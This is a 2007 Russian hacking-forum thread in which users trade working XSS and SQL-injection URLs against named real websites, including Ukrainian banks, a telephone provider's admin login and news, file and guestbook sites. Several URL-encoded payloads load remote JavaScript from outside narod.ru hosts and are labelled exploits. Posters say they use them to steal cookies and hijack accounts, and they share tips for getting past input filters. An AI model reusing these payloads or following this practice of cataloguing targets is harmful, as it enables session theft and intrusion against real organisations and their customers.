1. Пост двух одинаковых тем в разных разделах - бан.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

XSS

Тема в разделе "Поиск уязвимостей", создана пользователем Constantine, 8 май 2007.

  1. Хел
    Хел Новичок
    Симпатии:
    147
    Код:
    http://darkfate.ru/forum/memberlist.cgi?sort=alpha&simb=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    кукисы... также возможно поиграть с куками админа меняя параметры

    Добавлено через 21 час 20 минут
    Код:
    http://soul.ru/html/company.php?pageid=1+%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    Последнее редактирование: 2 авг 2007
    1 авг 2007
    1 человеку нравится это.
  2. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Код:
    http://diary.ru/list/?sort=&ord=&show=&fgroup_id=&username=&comm"><script>alert("XSS")</script>
     
    24 сен 2007
    1 человеку нравится это.
  3. Хел
    Хел Новичок
    Симпатии:
    147
    Код:
    http://privatbank.ua/info/search/searchresult.stm?mode=name&title=*%3cscript%3ealert%28%29%3c/script%3e*
    
    угоняем акки

    Добавлено через 25 минут
    Код:
    http://ufs.com.ua/ports/stock.php?CharID=%3Cscript%3Ealert(document.cookie)%3C/script%3E&Date=2007-03-30&Amount=30
    
    тоже самое

    Добавлено через 33 минуты
    Код:
    http://bank-ua.com/index.php?page=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Добавлено через 1 час 5 минут
    Код:
    http://bank-ua.com/index.php?page=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%48%65%6C%6B%65%72%6E%73%78%61%6B%2E%6E%61%72%6F%64%2E%72%75%2F%73%72%63%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    сплоит для bank-ua
     
    Последнее редактирование: 25 сен 2007
    25 сен 2007
    2 пользователям это понравилось.
  4. Хел
    Хел Новичок
    Симпатии:
    147
    Уязвимости Farlep.UA - крупного провайдера телефонной связи в Украине:

    Код:
    http://www.farlep.ua/ru/search/?text=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%65%6C%6B%65%72%6E%2D%36%35%39%37%38%36%2E%6E%61%72%6F%64%2E%72%75%2F%73%72%63%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    Еще одна в админке:
    Код:
    http://www.farlep.ua/admin/login.php?back_url=%22%3E%3Cscript%3Ealert()%3C/script%3E
    XSS Farlep.UA Sploit:

    Код:
    http://pagi.ru/7560e4/
    --------------------------------------------------------------------------

    MalHost.org <== Провайдер хоста:

    XSS Vulnerable:

    Код:
    http://malhost.org/mwhois/mwhois.php?domain=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%65%6C%6B%65%72%6E%2D%36%35%39%37%38%36%2E%6E%61%72%6F%64%2E%72%75%2F%73%72%63%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    Sploit:

    Код:
    http://pagi.ru/55f47f/
    На сегодня хватит =)
     
    Последнее редактирование: 30 сен 2007
    29 сен 2007
    2 пользователям это понравилось.
  5. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Активная XSS на hackedpro
    в коментарии к софту можно внедрить скрипт тегом

    [*img]javascript:alert()[/*img]
    Код:
    http://www.hackedpro.org/index.php?name=Files&op=view_file&lid=21
    Код:
    http://www.place.ru/view_news.phtml?id=147&dt=14.04.2006&weday="><script>alert()</script>
    MSN slate
    Код:
    http://www.slate.com/id/2174677/?GT1="><script>alert()</script>
    Код:
    http://www.guestbook.ru/?user=LECHAIM&action=sign&language="><script>alert()</script>
     
    30 сен 2007
  6. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    http://www.bashinvestbank.ru/search/
    вводим
    Код:
    "><script>alert()</script>
    ----------
    Код:
    http://www.crednews.ru/comnews/?PHPSESSID=20ff1d457e193ad6148ff2cd395a8d2d"><script>alert()</script>
    там же
    Код:
    http://www.crednews.ru/comnews/?PHPSESSID="><script>alert(1)</script>
     
    4 окт 2007
  7. Хел
    Хел Новичок
    Симпатии:
    147
    Код:
    http://go.km.ru/index.asp?sq=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&idr=4
    поиск, там еще почтовый сервак стоит...
     
    7 окт 2007
  8. Хел
    Хел Новичок
    Симпатии:
    147
    Код:
    http://www.diinoweb.com/?user=%3Cscript%3Ealert()%3C/script%3E
    тут у астера дневник)
     
    9 окт 2007
  9. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    bluejack.ru/soft
    в поиске
    Код:
    "><script>alert(String.fromCharCode())</script>
    Для получения кук нужно использовать функцию String.fromCharCode, т.е использовать только числа.

    спс Helkern'y за статью Обход фильтрации при XSS
     
    10 окт 2007
  10. Koller
    Koller Исчез... Глобальный модератор
    Симпатии:
    117
    Код:
    http://www.fluent-english.ru/index.php?section=%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    11 окт 2007
  11. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Код:
    http://www.zaycev.net/download.php?ass=%3Cscript%3Ealert(/XSS/)%3C/script%3E&id='
     
    11 окт 2007
  12. Koller
    Koller Исчез... Глобальный модератор
    Симпатии:
    117
    Код:
    http://www.forboredpeople.com/page.php?page=%3Cscript%3Ealert(/xss/)%3C/script%3E
    + возможен локальный инклуд...правда не думаю, что сможете вытянуть что-нибудь кроме "Hacking attempt"
     
    11 окт 2007
  13. Хел
    Хел Новичок
    Симпатии:
    147
    Код:
    http://www.mf-stalker.ru/p/index.php?searchstring=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&image.x=19&image.y=15
    Добавлено через 4 часа 14 минут
    Код:
    http://www.guestbook.ru/?user=%22%3E%3Cscript%3Ealert()%3C/script%3E
     
    Последнее редактирование: 13 окт 2007
    13 окт 2007
  14. Хел
    Хел Новичок
    Симпатии:
    147
    Код:
    https://stat.glstar.ru/login.php?pma_username="><script>alert()</script>&pma_password=test
     
    14 окт 2007
  15. KPOT_f1nd
    KPOT_f1nd hiddeN Stuff Новичок
    Симпатии:
    11
    Код:
    http://www.columba.ie/catalogue.php?cat=<XSS>&ISBN=0814627730
     
    14 окт 2007
  16. Хел
    Хел Новичок
    Симпатии:
    147
    Код:
    http://lib.aldebaran.ru/login/?err=1...&login_username=%22%3E%3Cscript%3Ealert()%3C/script%3E
     
    18 окт 2007
  17. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Код:
    http://bazar.co.ua/photo/show.php?user_id=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    18 окт 2007
  18. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    XSS в скулях
    Код:
    http://www.llatalent.com/current/index.php?current_id=999999+union+select+1,2,0x3c7363726970743e616c657274282778737327293b3c2f7363726970743e,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    Код:
    http://fckhimki.ru/modules/news/index.php?current_id=999999+union+select+1,2,0x3c7363726970743e616c657274282778737327293b3c2f7363726970743e,4,5,6,7,8,9,10,11,12,13/*
     
    23 окт 2007
  19. EXploit
    EXploit Продвинутый
    Симпатии:
    25
    Пришел спам по аське, проверил сайтик, вот результат.
    Кстати, мой первый XSS. :)

    PHP:
    http://inkompress.uz/send_finish.php?name=%3Cscript%3Ealert(/XSS/)%3C/script%3E
    XSS в форме
    PHP:
    http://tak.ru/enter.php
     
    Последнее редактирование: 30 окт 2007
    25 окт 2007
    1 человеку нравится это.
  20. EXploit
    EXploit Продвинутый
    Симпатии:
    25
    вот еще...
    PHP:
    http://v3.espacenet.com/results?TI=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&sf=a&DB=EPODOC&PGS=10&CY=ep&LG=en&ST=advanced
     
    30 окт 2007
    1 человеку нравится это.

Поделиться этой страницей

Загрузка...